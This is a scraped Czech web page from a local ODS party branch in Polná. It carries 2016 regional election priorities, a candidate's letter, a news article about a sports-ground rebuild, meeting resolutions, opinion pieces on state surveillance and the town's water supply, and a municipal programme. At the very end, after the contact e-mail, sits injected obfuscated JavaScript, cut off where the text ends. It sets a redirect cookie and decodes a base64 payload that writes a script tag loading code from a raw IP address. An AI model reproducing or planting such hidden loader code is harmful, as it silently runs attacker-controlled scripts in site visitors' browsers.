Přemýšlíme pravicově

ODS

kandidatni-listina-ods-vysocina-_-jihlava

Programové priority ODS na Vysočině pro krajské volby 7. – 8. října 2016 www.odsvysocina.cz  

Obzvláště důležitý je pro nás důraz na bezpečný a klidný život na Vysočině. Chceme proto rozvíjet spolupráci s Policií České republiky a s Hasičským záchranným sborem ČR, stejně jako s dobrovolnými hasiči, a to zejména v rámci Integrovaného záchranného systému. Za samozřejmou považujeme podporu kvalitního fungování Zdravotnické záchranné služby.

 Jsme si vědomi toho, že aktivní podpora podnikání přináší nové pracovní příležitosti.

Veřejný sektor má však příznivé prostředí pro podnikání spoluvytvářet, a ne je deformovat výběrovými dotacemi. Úřady nemají vytvářet pracovní příležitosti, nýbrž nepřekážet těm, kteří se o jejich vznik snaží. 

V sociální politice chceme podpořit ty, kteří pracují, nebo aktivně práci hledají, a mají snahu zlepšovat život svůj i svých blízkých. Odměňována má být aktivita. Zneužívání sociálních opatření a dávek odmítáme. 

Jsme pro vyrovnané, resp. mírně přebytkové hospodaření a promyšlené nakládání s veřejnými prostředky. Jsme pro úsporné, efektivní a vstřícné fungování Kraje. Zasadíme se o zcela transparentní hospodaření úřadu i jím řízených institucí a rovněž o průhledné vypisování veřejných zakázek podle pravidel.

 Jsme přesvědčeni a zcela respektujeme, že Kraj a jeho orgány nejsou nadřízeny městům a obcím, ale mají být jejich přirozeným partnerem a pomocníkem. 

Budeme podporovat pravidelné a odpovídající investice do oprav a zkvalitňování silniční sítě na Vysočině, přičemž zajistíme průhledné zadávání zakázek. Jsme pro opravy a investice na základě veřejně známého, dodržovaného a dlouhodobého plánu.

 Zjednodušíme cestování obyvatelům Vysočiny zavedením jednotné jízdenky pro různé druhy hromadné veřejné dopravy. Budeme usilovat o vznik integrovaného dopravního systému na Vysočině, k jehož zavedení za minulých osm let stále nedošlo. 

Bohatý spolkový život, rozmanité a nezávislé kulturní aktivity, výkonnostní i rekreační sport považujeme za podstatnou součást svobodného prostoru občanské společnosti. Hodláme tento život podporovat, mimo jiné formou pravidelně vypisovaných grantů pro kulturní instituce, spolky a sportovní sdružení. 

Chceme podporovat kvalitnější výuku cizích jazyků i prostřednictvím podpory tzv. bilingvních tříd, ve kterých by se vyučovaly předměty v cizím jazyce, a motivovat žáky k získávání mezinárodních jazykových certifikátů, které jasně prokazují dosaženou úroveň žáka v cizím jazyce. 

Ředitelé, učitelé a další zaměstnanci ve školách jsou zatíženi čím dál větší byrokracií. Tuto zátěž chceme snížit. Ve škole se má učit a vychovávat, a ne vyplňovat tabulky a popisovat stovky stran zprávami o všem možném.

 Zasadíme se o zavedení jednotné (sdílené) vstupenky do kulturních zařízení Kraje Vysočina, s níž by bylo možné navštěvovat různé instituce na území Kraje. Zároveň s tím podporujeme finanční zvýhodnění pro časté návštěvníky těchto krajských zařízení. 

V zájmu pěstování a rozvíjení kulturních hodnot mládeže podpoříme volný vstup pro žáky a studenty z Vysočiny do kulturních institucí Kraje.

Považujeme za nutné, aby Kraj Vysočina důsledně podporoval zemědělce na Vysočině v jednání se státem. Zejména v otázce srovnávání podmínek postavení zemědělců mezi tzv. starými a novými zeměmi EU. Ať už v oblasti snižování sociálních odvodů či slevy na daních z dotací EU do živočišné výroby od roku 2016

Jasná pravidla, zodpovědná řešení!

 

Vážení občané Kraje Vysočina

Rád bych vás touto cestou seznámil s kandidátní listinou Občanské demokratické strany pro letošní krajské volby na Vysočině. Spolu s ní vám předkládáme i náš program, s nímž se ucházíme o vaše hlasy.Kandidátka ODS je sestavena z lidí s bohatou profesní i lidskou zkušeností, přičemž záměrně územně zastupuje oblasti z celého kraje Vysočina. Naším zájmem je totiž rozvoj nejen jeho centrálních částí, nýbrž i těch okrajových. Krajský program se opírá o naše občansko-demokratické postoje a zároveň o poznatky z měst a obcí, v nichž na Vysočině žijeme, pracujeme a podnikáme.Nabízíme vám náš pohled na správu veřejných záležitostí v klíčových oblastech krajské samosprávy, jako je doprava, školství, zdravotnictví, sociální služby, kultura a péče o památky, ochrana životního prostředí či rozvoj venkova a zemědělství.Přejeme si, aby se úřady a organizace Kraje orientovaly především na službu obyvatelům Vysočiny, aby přispívaly k zachovávání přírodních a kulturních hodnot našeho kraje a přitom udržovaly rozumné a vyvážené hospodaření s veřejnými prostředky.Naším cílem je, aby se na Vysočině žilo podle jasných a stabilních pravidel, kde k přístupu k informacím či veřejným zdrojům nepotřebujete mít správné známé. Chceme, aby se v našem kraji přijímala zodpovědná řešení vůči budoucnosti a nepřevažoval momentální zájem úzké skupiny lidí. Přáli bychom si, aby se na Vysočině žilo svobodně a aby její obyvatelé nebyli svazováni zbytečnou regulací a dotěrným usměrňováním ze strany veřejného sektoru.Věříme, že naším společným zájmem je bezpečný, klidný a přitom zajímavý život na Vysočině, kde se cítí dobře především zdejší obyvatelé a také její návštěvníci.S přátelským pozdravem Zdeněk Geist lídr kandidátky

Programové priorityObzvláště důležitý je pro nás důraz na bezpečný a klidný život na Vysočině. Chceme proto rozvíjet spolupráci s Policií České republiky a s Hasičským záchranným sborem ČR, stejně jako s dobrovolnými hasiči, a to zejména v rámci Integrovaného záchranného systému. Za samozřejmou považujeme podporu kvalitního fungování Zdravotnické záchranné služby.Jsme si vědomi toho, že aktivní podpora podnikání přináší nové pracovní příležitosti. Veřejný sektor má však příznivé prostředí pro podnikání spoluvytvářet, a ne je deformovat výběrovými dotacemi. Úřady nemají vytvářet pracovní příležitosti, nýbrž nepřekážet těm, kteří se o jejich vznik snaží.V sociální politice chceme podpořit ty, kteří pracují, nebo aktivně práci hledají, a mají snahu zlepšovat život svůj i svých blízkých. Odměňována má být aktivita. Zneužívání sociálních opatření a dávek odmítáme.Jsme pro vyrovnané, resp. mírně přebytkové hospodaření a promyšlené nakládání s veřejnými prostředky. Jsme pro úsporné, efektivní a vstřícné fungování Kraje. Zasadíme se o zcela transparentní hospodaření úřadu i jím řízených institucí a rovněž o průhledné vypisování veřejných zakázek podle pravidel.Jsme přesvědčeni a zcela respektujeme, že Kraj a jeho orgány nejsou nadřízeny městům a obcím, ale mají být jejich přirozeným partnerem a pomocníkem.Budeme podporovat pravidelné a odpovídající investice do oprav a zkvalitňování silniční sítě na Vysočině, přičemž zajistíme průhledné zadávání zakázek. Jsme pro opravy a investice na základě veřejně známého, dodržovaného a dlouhodobého plánu.Zjednodušíme cestování obyvatelům Vysočiny zavedením jednotné jízdenky pro různé druhy hromadné veřejné dopravy. Budeme usilovat o vznik integrovaného dopravního systému na Vysočině, k jehož zavedení za minulých osm let stále nedošlo.Bohatý spolkový život, rozmanité a nezávislé kulturní aktivity, výkonnostní i rekreační sport považujeme za podstatnou součást svobodného prostoru občanské společnosti. Hodláme tento život podporovat, mimo jiné formou pravidelně vypisovaných grantů pro kulturní instituce, spolky a sportovní sdružení.Chceme podporovat kvalitnější výuku cizích jazyků i prostřednictvím podpory tzv. bilingvních tříd, ve kterých by se vyučovaly předměty v cizím jazyce, a motivovat žáky k získávání mezinárodních jazykových certifikátů, které jasně prokazují dosaženou úroveň žáka v cizím jazyce.Ředitelé, učitelé a další zaměstnanci ve školách jsou zatíženi čím dál větší byrokracií. Tuto zátěž chceme snížit. Ve škole se má učit a vychovávat, a ne vyplňovat tabulky a popisovat stovky stran zprávami o všem možném.Zasadíme se o zavedení jednotné (sdílené) vstupenky do kulturních zařízení Kraje Vysočina, s níž by bylo možné navštěvovat různé instituce na území Kraje. Zároveň s tím podporujeme finanční zvýhodnění pro časté návštěvníky těchto krajských zařízení.V zájmu pěstování a rozvíjení kulturních hodnot mládeže podpoříme volný vstup pro žáky a studenty z Vysočiny do kulturních institucí Kraje.Považujeme za nutné, aby Kraj Vysočina důsledně podporoval zemědělce na Vysočině v jednání se státem. Zejména v otázce srovnávání podmínek postavení zemědělců mezi tzv. starými a novými zeměmi EU. Ať už v oblasti snižování sociálních odvodů či slevy na daních z dotací EU

Zdroj: ODS – Občanská demokratická strana

Rekonstrukci sportoviště Polná zaplatí nakonec sama

Polná – Dotaci se získat nepodařilo. Zastupitelé rozhodli, že víceučelové hřiště s in-line dráhou za pět a půl milionu korun uhradí město na etapy.

Víceúčelové sportoviště. Ilustrační foto.

Víceúčelové sportoviště. Ilustrační foto.Autor: archiv Deníku

Polná se žádostí o dotaci neuspělo. Rekonstrukci nového volnočasového sportoviště s umělým povrchem město zafinancuje samo. Na etapy. Rozhodlo o tom středeční zastupitelstvo.

Protože jsme nezískali dotaci, rozhodli jsme na zastupitelstvu, že na rekonstrukci uvolníme dva a půl milionu ze svého rozpočtu na první etapu a příští rok dofinancujeme zbytek,” uvedl starosta Polné Jindřich Skočdopole (Nezávislí pro Polnou).

Celková rekonstrukce sportoviště má vyjít na pět a půl milionu korun.

Na volnočasovém hřišti si bude možné zahrát například hokejbal, florbal, nohejbal a další míčové hry. Kolem hřiště má být dráha pro kolečkové brusle. V zimě pak sportoviště bude možné díky postřiku proměnit na ledovou plochu.

Víceúčelové hřiště vznikne hned vedle městského stadionu v ulici Boženy Němcové, kde je vybudované i nové zázemí, a nedaleko se nachází i dětské hřiště. Areál tak bude moci posloužit mladším i starším dětem.

Sportoviště v minulosti sloužilo jako zimní stadion, kde bruslily hlavně školy. Protože ale fungoval na bázi přírodního ledu, využíval se dohromady jen asi tři neděle v roce. Minulé zimy totiž nebyly tak tuhé,” vysvětlil v minulosti starosta Polné, proč chtějí zastupitelé zastaralý zimní stadion proměnit ve víceúčelové hřiště.

Město chtělo nejprve rekonstrukci uhradit z dotace, proto si podalo žádost na Ministerstvo školství, mládeže a tělovýchovy. Podle slov starosty ale byla tato žádost jednou ze čtrnácti set, které v součtu požadovaly osm miliard korun.

Podpořeno bylo ale nakonec pouze osmdesát žádostí ve výši čtyři sta milionů korun,” dodal Skočdopole s tím, že snažit se získat dotaci znovu se městu v objemu žádostí jeví jako marné. I přesto se chce Polná ještě pokusit získat dotaci na rekonstrukci tělocvičny základní školy, když jim tato nevyšla.

Nové sportoviště nebude oploceno, a bude tak volně přístupné komukoliv a kdykoliv. Pracovat se na něm má začít od 15. září. Stavební firmu město vybralo již na jaře, ale čekalo, jak dopadne se žádostí o dotaci.

Polná má už jedno podobné víceúčelové sporotoviště U Studánky, což je hřiště s umělým trávníkem i běžeckou dráhou. Využívají ho především školy. Sporotoviště má svého správce, od kterého si zájemci mohou zapůjčit například míče či rakety na stolní tenis a podobně. 

Autor: Redakce


Zdroj: 
http://jihlavsky.denik.cz/zpravy_region/rekonstrukci-sportoviste-polna-zaplati-nakonec-sama-20160717.html

Jsme rádi že zastupitelé a město podpořilo náš návrh na rekonstrukci areálu zimního stadionu v Polné. Bude tento areál konečně mít svůj smysl, využití pro širokou veřejnost a nebude působit jako zapomenutý kout v Polné . Jako víceúčelové hřiště by mělo mít využití po celý rok, to znamená že to není jen zimní stadion ,hřiště na jeden sport. Bude to sportoviště které využije skoro každý sportovec v Polné , inline dráha kolem hřiště bude určitě také hojně využívaná. Děkujeme i za podporu od pana starosty , který tento projekt podpořil od samého začátku .

MS ODS Polná

 

Usnesení z členské schůze MS ODS Polná ze dne 6.6.2016
Přítomni: Jahoda B., Kubašta M., Neubauer J., Suchý J., Vlach I., Vlach P.,
Vencovský P.
1. MS ODS Polná doporučuje vedení ODS více reagovat a uskutečňovat kon- Struktivní, srozumitelné a zásadnější vyjádření k hlavním a důležitým té- matům v naší společnosti tak, aby tato vyjádření oslovila co nejširší část obyvatel ČR.

2. MS ODS Polná doporučuje vedení ODS, aby byla stále otevřenou stranou a vždy se snažila sjednocovat a podporovat vyjednávání potřeby míru u nás i ve světě. Zejména, když vnímáme velký nárůst státní moci, velký rozvoj vojenské techniky (včetně jaderných zbraní) a migrace.

3. MS ODS Polná vybrala od členů 3.700,-Kč na částečnou úhradu dluhu OS Jihlava vůči ODS.
(Apfelthaler L. – 500,-Kč , Bárta P. – 500,-Kč , Jahoda B. – 500,-Kč , Kubaš-
Ta M. – 500,-Kč , Neubauer J. – 100,-Kč , Suchý J. – 100,-Kč , Vlach I. –
500,-Kč , Vlach P. – 500,-Kč , Vencovský P. – 500,-Kč)
4. MS ODS Polná navrhuje, aby jednání OR ODS Jihlava probíhala také střídavě v místních sdruženích oblasti. Tímto způsobem zapojíme více členskou základnu do činnosti oblasti.
S usnesením souhlasí všichni přítomní členové MS ODS Polná.
Zapsal: Kubašta Miloš – předseda MS ODS Polná

Zdeněk Geist: Soukrom(n)í pod tlakem

3LED2016Co mají společného kontrolní hlášení daně z přidané hodnoty, elektronická evidence tržeb a konečně i zákaz kouření v restauracích, či umožnění vstupu úředníků do soukromých obydlí při kontrole topiva?

Jedná se o normy, jejichž dopad s sebou nese nejen ekonomické souvislosti. Dotýká se také jiných hodnot, na které jsme si za poslední čtvrtstoletí zvykli. Soukromí a individualismu, chcete-li jedinečnosti.

Stát tak neúměrnou mírou kontroly, nařizování a hlavně povinným shromažďováním detailních údajů o našich aktivitách vychyluje pomyslnou rovnováhu mezi aktivitou a soukromím jedince a jeho povinností vůči společnosti (vyjádřenou např. daňovým odvodem) za přijatelnou mez. Přesouvá povinnou administrativní zátěž na občany či soukromé společnosti, aniž je zřejmé, co za to na oplátku nabízí. Zda sám zlepší svůj výkon, tedy např. stane se efektivnějším, úspornějším či vstřícnějším.

Obrovské množství takto soustředěných informací se stane samozřejmým lákadlem pro jejich možné zneužití, aniž víme, jak tomu anonymní státní úřady umí – či možná dokonce vůbec chtějí – včas zabránit. Není ani zcela jasné, jak a kdo bude s takto získanými daty pracovat a zda je vůbec v jeho silách takové informace správně vyhodnotit a zabezpečit jejich přenos proti riziku zneužití.

A vlastně vůbec nevíme, kam až třeba budoucí další obdobná tzv. „kontrolní hlášení“ mají zajít? Co ještě vlastně v budoucnu budeme nuceni kontrolně hlásit?

Jsme svědky toho, kdy úřady místo snahy o větší efektivitu v rámci daných pravidel a zákonů raději sáhnou po pomyslném dalším vrchnostenském karabáči. Už nestačí kontrola namátková a občasná. Nyní tedy pravidelně, dál a do hloubky.

Zahalena do pláštíku údajného veřejného zájmu zvyšuje státní moc dohled nad svými obyvateli, aniž se sama vystavuje větší veřejné kontrole. A zatímco sama je stále složitější, rozpínavější a méně pochopitelná, odhaluje pořád více ze soukromí svých občanů a proniká stále více do jejich „kruhů“. V případě daňových opatření je pak často argumentováno nutností lepšího výběru daní. Je zajímavé, že v zemích autoritářských právě údajné daňové nedoplatky vedou často k účelovému potírání společensky či politicky nepohodlných osob.

Paradoxní je, že všechna tato opatření jsou z déletrvající perspektivy pro stát a společnost škodlivá. Vedou totiž jen k odcizování a nechuti občanů ke správě veřejných záležitostí. Na vztahu postaveném na nedůvěře, podezírání, dirigismu a přehnané kontrole nelze totiž vystavět nic pozitivního. To platí jak pro osobní život, tak i pro veřejné dění.

Mgr. Zdeněk Geist
předseda oblastního sdružení ODS Jihlava

   

  FaceBook

                                                  

  KOMUNÁLNÍ   VOLBY  V  POLNÉ    „POLNÁ-LIDEM“

                                             2014-2018

   

      Teze programu „Polná-Lidem“

  1. Správa města
  2. Polná v okrese a kraji
  3. Školství
  4. Voda pro Polnou
  5. Kultura a sport
  6. Péče o památky a turistika
  7. Ekologie a ochrana krajiny

   

  1. Město a místní části

  Kvalitní, otevřený a transparentní městský úřad je podmínkou pro efektivní správu obecního majetku a řádné fungování městských organizací.

  Polná nekončí hradbami, místní části jsou stejně důležitou částí města. Podpoříme jejich rozvoj podle místních podmínek, doplnění inženýrských sítí. Duší obce je činnost místních spolků a práce osadních výborů.

  Místní části jsou atraktivní pro ty, kteří chtějí žít ještě více na venkově. Výstavba inženýrských sítí, péče o vzhled obce, podpora místních spolků, možnost výstavby, tím vším může město přispět k tomu, aby místní části žily plnohodnotným životem.

  Spolkový a společenský život v místních částech motivuje k péči o své okolí. Bez aktivity občanů budou místní části jen shlukem chalup.

   

  2. Polná v okrese a kraji

  Polná je atraktivním místem pro život na Vysočině. Musí být klidným, čistým, bezpečným a dobře dostupným městem. Podmínkou je péče o infrastrukturu – vybavenost města i návaznost na dopravní sítě.

  Chceme nabídnout místo k bydlení i podnikání a zlepšit dopravní dostupnost města, především ve směru k dálnici. Růstu Polné musí odpovídat i vývoj veřejné infrastruktury. Tím máme na mysli především základní školství a dostatečnou kapacitu sítí.

  Chceme život v bezpečném maloměstě nabídnout jako alternativu k Jihlavě, Havlíčkovu Brodu i ostatním obcím. Podmínkou nutnou je včasná příprava stavebních míst.

   

  3. Školství

  Je nutno konečně vyřešit školní tělocvičnu, po osmi letech „řešení“ je město opět na začátku!

  Kapacita obou školních budov ZŠ je vyčerpána a návrh územního plánu s řešením tohoto stavu nepočítá, přestože počet obyvatel města má vzrůst o třetinu.

  Přístavba školní tělocvičny k budově na Podděbradově ulici vázne na souhlasu památkářů. Pokud neprosadíme tuto variantu, chceme jednat s Lidovým spolkem o rekonstrukci a společném využití Lidového domu.

   

  4. Voda pro Polnou

  Vlastní voda z vlastní vodárny spravované městem. Vystoupíme ze SVaK.

  Prosazujeme opětovné zprovoznění polenské úpravny vody. Je nutné vystoupení Polné ze SVaKu Jihlavsko. Tento svazek obcí řídí lidé, kteří zájmy občanů členských obcí nerespektují. Se svěřenými finančními prostředky nenakládají hospodárně a způsobili milionové škody (prohrané soudní spory s Jihlavou). Polenskou úpravnu vody a čistírnu odpadních vod může Polná provozovat sama, případně prostřednictvím vlastní společnosti. Jsme přesvědčeni, že zisk z této činnosti bude větší, než nájem hrazený společností SVaK. Bude přednostně použit na rekonstrukci stávajícího vodovodního a kanalizačního řadu.

   

  5. Kultura a sport

  Prioritou je aktivní trávení volného času, sportovní a kulturní aktivity musejí být rovnoprávné. Podporujeme spolkové a zájmové činnosti vč. rekreačního sportu, chceme okruh kolem Pekla pro vycházky i projížďku na kole i bruslích, místo zelených rybníků umělé koupaliště, fungování ZUŠ i DDM, úpravu kluziště zimního stadionu pro celoroční sportovní využití.

  Chceme napojení Polné na síť cyklostezek, abychom do města přivedli více návštěvníků.

  Chceme sportovní a rekreační nabídku pro všechny. Naší prioritou je aktivní sportovní vyžití pro každého, kdo má o něj zájem. Ať jde o organizovaný sport, ať jde o aktivní rekreaci.

  Rekreačnímu sportu chceme věnovat nejméně stejnou pozornost jako sportu výkonnostnímu a ostatní sporty zrovnoprávníme s fotbalem. Snadnou úpravou povrchu lze zimní stadion nabídnout k celoročnímu využití pro různé sporty.

  Prvním úkolem je vybudovat víceúčelový rekreační okruh kolem Pekla, využitelný pro cyklistiku a bruslení.

  Chceme, aby Polná byla připojena na kvalitní síť cyklostezek a cyklotras. Budeme hledat trasu podél Šlapanky do Havlíčkova Brodu. Navrhujeme napojení této trasy z Věžnic přes Dolní Jablonnou na Sázavskou cyklostezku a dál ke Ždáru nad Sázavou. Budeme hledat i napojení na síť cyklostezek v Jihlavě. Čtvrtým směrem je propojení s atraktivní cyklotrasou od Luk nad Jihlavou podél řeky Jihlavy.

  Polná postrádá možnost bezpečného koupání. Město potřebuje umělé koupaliště.

  Budeme podporovat zájmové a spolkové činnosti. Polná vždy vynikala spolkovou činností. Stejně jako sportovní vyžití má na spravedlivou podporu nárok i vyžití kulturní.

   

  6. Turistika a péče o památky

  Chceme Polnou přitažlivou pro aktivní turistiku, spojit pohyb a pobyt v krajině s návštěvou památek. Návštěvníci jsou impulsem pro rozvoj služeb. Chceme pokračovat ve zvelebování památek i celého centra. Nejsme skanzen, chceme památky živé v živém městě.

  Příkladem rozvoje turistiky nám jsou Přibyslav a Luka nad Jihlavou, Polná však může nabídnout ještě více.

  Historie a její památky jsou darem. Chceme mít krásné historické město, lákavé a přívětivé k návštěvníkům a také příjemné pro život domácích. Vedle nejvýznamnějších památek – kostelů, zámku a Židovského města chceme přispět k dalšímu zvelebení centra.

   

  7. Ekologie a ochrana krajiny

  Člověk a krajina zde spolu žijí tisíc let, dokáží to i nadále

  Chceme zdravé a pěkné životní prostředí v Polné i v místních částech. Pole, louky a lesy Vysočiny pomáhá člověk vytvářet tisíc let. Bez přítomnosti člověka v krajině tato malebnost zanikne! Jsme přesvědčeni, že ochranu prostředí, podnikání a rekreační funkce krajiny lze spojit. Odmítáme těžbu uranu na Polensku !

                                                                                                facebook – Polná-Lidem “ODS Polná”

  Sportoviště v Polné

   Když jsem byl kluk školou povinný, tak se sportovalo na každém plácku ať formou fotbálku nebo hřišť pro mrňata. V  zimě zas na rybnících bylo samé hřiště, kde se do tmy hrál hokej nebo se jen tak bruslilo. Dnešní uspěchaná a tvrdá doba nese to, že rodiče jsou do večera v práci a nemají často čas na děti, jak by chtěli. Tento problém pomáhají řešit různé zájmové sdružení, které vedou mládež k pohybovým aktivitám, ke kultuře, ke sportu, zlepšující koordinaci těla a soustředěnost, optimismus a na lepší pohled na trávení volního času. Krásným příkladem je například sdružení volejbalu v Polné, kde tráví čas děti společně s rodiči v dětském koutku, který si tam volejbalisté vytvořili. Toto je jedna z cest jak odtáhnout děti od vysedávání v parku, u počítačů atd.

  Pomozme dětem a mládeži a lidem v Polné ,vytvořit místa pro sport, pro aktivitu, kde jim to umožníme.  Co třeba například úprava Polenského hokejového stadionu! Toto sportoviště nemusí býti jen na bruslení. Když by se tam udělal betonový povrch a mantinely, tak bude areál využíván 12 měsíců v roce. Dá se tam hrát spousta sportů jako nohejbal , volejbal , tenis , házená, košíková, hokejbal, hokej, místo kde se dá jezdit na kolečkových bruslích, větší investice by nebyla potřeba , protože by se dalo využít zázemí Městského stadionu .

  Další věc, která je potřeba v Polné je cyklostezka, okruh který bude třeba mít 2 , 3 , 4 km .  Jezdíme často do Přibyslavi a potkáváme na místní cyklostezce desítky Nás Poleňáků . Je třeba se zamyslet a vytvořit dětem a mládeži a nám dospělým další možnosti se někde protáhnout a zasportovat. Sportem našich děti a mládeže uděláme další krok k šanci, že nebudou sedět v parku , nebo kouřit, pít alkohol v háječku nebo brát drogy.

   

   

  Pavel Vencovský , Petr Vlach          MS ODS Polná

  facebook          Polná-lidem „ODS Polná“  

  ODS prosazuje podporu amatérského sportu a Základních uměleckých škol

  Krajští zastupitelé ODS navrhli, aby kraj podpořil neprofesionální, zejména mládežnický sport. Navrhli také krajské radě vyšší podporu Základních uměleckých škol a asistentů hendikepovaných žáků.

  „Příjmy krajského rozpočtu se vyvíjí dobře, i to umožňuje věnovat z krajské úrovně vyšší pozornost oblastem, které byly v posledních letech na Vysočině spíše popelkou,“ zdůvodnil návrh předseda klubu krajských zastupitelů ODS Ota Benc.

  Zastupitelé ODS navrhli, aby kraj podporu neprofesionálního sportu navýšil o dva miliony na šest milionů korun, které rozděluje Všesportovní kolegium Kraje Vysočina. Jde o systémové, propracované rozdělování podpory v rámci kraje. „Šest milionů pro neprofesionální sport už jsme navrhovali při schvalování krajského rozpočtu. Je to částka, která byla obvyklá za hejtmana Miloše Vystrčila z ODS,“ popsal návrh Ota Benc.

  Dalším návrhem je krajská podpora Základním uměleckým školám na Vysočině a podpora asistentů hendikepovaných dětí, začleňovaných do základních škol. „Města evidují podstatně vyšší zájem dětí o základní umělecké školy, než jim jejich rozpočty umožňují. Na Vysočině jde o obecný jev a je nezbytně nutné s tím něco udělat. Stejně tak je akutním dlouhodobým problémem podcenění asistentské činnosti pro děti s postižením,“ řekl Benc.

  Zastupitelé ODS proto požádali krajskou radu, aby na příští jednání krajského zastupitelstva předložila návrh podpory Základních uměleckých škol a podpory činnosti asistentů hendikepovaných dětí. „Obecně se domníváme, že systémová podpora zájmové umělecké činnosti a neprofesionálního sportu na Vysočině je účinnější, než nahodilé a ad hoc rozdělování peněz na neúčinné evropské a krajské akce, přes které tečou peníze často nahodile a nesystémově,“ shrnul krajský zastupitel a senátor Miloš Vystrčil.      

   

  Ota Benc
  předseda Klubu krajských zastupitelů ODS Vysočina

  facebook : Polná-Lidem „ODS Polná“

  Nekopat do SVAKu!

  Touto větou shrnul na veřejném jednání k uzavření polenské vodárny starosta Jindřich Skočdopole představu vedení města o zásobování vodou. A to přestože:
  1. SVAK je v krizi od roku 2009, kdy Jihlava oznámila záměr vystoupit
  2. Vedení SVAKu brání vydání majetku Jihlavy a na právní služby, nyní i exekuční náklady vynakládá milionové částky. Protože SVAK žádné hodnoty nevytváří, bud…ou tyto peníze platit občané v ceně vodného. Pokud SVAK dnes tyto peníze vezme z prostředků na obnovu a rozvoj sítí, zaplatí to občan zítra!
  3. Rychlý růst ceny vodného přímo vybízí k hledání levnější vody z místních zdrojů. Dvacet let nečinnosti skončilo uzavřením vodárny. Bez vlastní vodárny bude Polná rukojmím sporů mezi Jihlavskou vodárenskou a Vodárenskou akciovou!
  Nyní reálně hrozí, že vedení SVAK se podaří prosadit takovou změnu stanov, která obce o jejich vložený majetek reálně připraví – pokud ze SVAKu vystoupí, odejdou bez majetku. Politika „nekopání do SVAKu“ skončí tím, že v Polné budeme mít vodu předraženou hned dvakrát. Jednak o zisky producenta (Jihlavské vodárenské) a dopravce (Vodárenské akciové), jednak o režie SVAK. A v režii SVAK se nepochybně projeví náklady na nesmyslně vedené spory s Jihlavou i skutečnost, že náklady na fungování SVAKu se budou prostě rozpouštět na třetinový objem spotřebované vody, než tomu bylo v době členství Jihlavy.
  Pokud se vedení města hájí prostředky, které Polná získává od SVAKu, jde ve skutečnosti o peníze, které občané Polné ve vodném a stočném zaplatili a které do rozpočtu přicházejí po zrekvírování 20 % DPH a transakčních nákladů SVAK. Ve skutečnosti jde o skrytou místní daň, z níž pouze část doputuje do městského rozpočtu zpátky.
  Je zřejmé, že vedení města si z usnesení říjnového zastupitelstva, které se vyslovilo proti uzavření polenské vodárny, mnoho nedělá. A členové zastupitelstva všech politických adres se spokojili s přijetím rozhořčené deklarace. Místo toho, aby se ptali, jak je s usnesením naloženo, rozhořčeně krčí rameny. Používat vodu jenom jako předvolební téma je krátkozraké, po volbách mohou být v platnosti nové stanovy SVAK a už si nikdo nekopne.
  Polná je dnes jedním z největších podílníků SVAK a nic jí nebrání jednat s ostatními obcemi o jeho budoucnosti. Zabránit vedení SVAKu blokovat možnosti vystoupení je jen prvním nezbytným krokem. Současně s tím je nutno zpracovat koncepci zásobování města vodou z vlastních zdrojů a podle ní dál postupovat. Zatím se však neudělalo nic a není pravda, že času je dostatek. Uzavřená vodárna chátrá a vedení SVAKu pracuje na zabetonování svých pozic.

   

  Pavel Bárta a Miloš Kubašta
  MS ODS POLNÁ

  facebook –     polná-lidem „ODS Polná“

  Kubašta Miloš

  Miloš Kubašta

  – předseda MS Polná, člen rady MS Polná, člen Oblastní rady ODS Jihlava

  Bárta Pavel                                                                                                                                                                                                                                                                                                                                       – místopředseda MS, člen rady MS ODS Polná

  Vlach Petr

  – člen rady MS ODS Polná

  Členové ODS Polná :

  Apfelthaler Ladislav

  Hurych Tomáš

  Jelínek Miloš

  Vlach Ivan

  Vlach Radan

  Suchý Jaroslav

  Neubauer Jaroslav

  Vencovský Pavel

   

  facebook – polná – lidem   , e-mail :  info@polna-lidem.cz ));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(‚